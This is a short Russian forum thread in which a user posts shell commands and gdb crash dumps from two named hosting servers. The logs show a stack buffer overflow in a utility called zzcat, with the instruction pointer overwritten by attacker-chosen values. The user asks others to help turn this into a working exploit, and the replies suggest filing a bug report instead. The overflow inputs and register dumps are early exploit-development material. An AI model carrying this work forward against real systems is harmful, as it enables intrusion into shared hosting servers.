Buffer Overflows
 

Нашел багу в прогe zzcat ## <-Buffer Overflows->##

Вот лог )))

FreeBSD server10.ehostsource.com 4.10-RELEASE-p5 FreeBSD 4.10-RELEASE-p5 #0: Thu Dec 16 10:23:35 EST 2004 root@server10.ehostsource.com:/usr/obj/usr/src/sys/EASYADMIN i386

-bash-2.05b$ zzcat `perl -e "print 'A'x1040"`
Segmentation fault (core dumped)

-bash-2.05b$ gdb -c zzcat.core

Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) i r
eax 0x0 0
ecx 0xbfbff62f -1077938641
edx 0xbfbff689 -1077938551
ebx 0x2806bf58 671530840
esp 0xbfbff688 0xbfbff688
ebp 0xbfbff7a8 0xbfbff7a8
esi 0xbfbff7a8 -1077938264
edi 0x1 1
eip 0x41414141 0x41414141


-bash-2.05b$ zzcat `perl -e 'print "\x90"x1036 , "\x44\x33\x22\x11"'`

Segmentation fault (core dumped)

-bash-2.05b$ gdb -c zzcat.core

Program terminated with signal 11, Segmentation fault.
#0 0x11223344 in ?? ()
(gdb) i r
eax 0x0 0
ecx 0xbfbff62f -1077938641
edx 0xbfbff689 -1077938551
ebx 0x2806bf58 671530840
esp 0xbfbff688 0xbfbff688
ebp 0xbfbff7a8 0xbfbff7a8
esi 0xbfbff7a8 -1077938264
edi 0x1 1
eip 0x11223344 0x11223344

######################################
######################################
-jailshell-2.05b$ uname -a
Linux neit11.nsserver.net 2.4.20-021stab022.8.777-enterprise #1 SMP Fri Nov 12 10:42:02 MSK 2004 i686 i686 i386 GNU/Linux

-jailshell-2.05b$ zzcat `perl -e "print 'A'x4118"`

Segmentation fault (core dumped)

Нужна ваша помощь в продолжении )))

С Уважением Dmcox )))

Так. а смысл? Прога суидная? Или есть вариант выполнять код в пространстве ядра?

Может zcat?
В любом случае утилита пользовательского уровня. Опыт конечно неплохой, но лучше отправь баг-репорт разработчику.

Нет именно zzcat )))

НЕТ не суидная смысл самой баги )))

Так что помочь не кто не желает кстати во втором случае помойму вазможно Heap Overflow если что стучитесь в ICQ ))))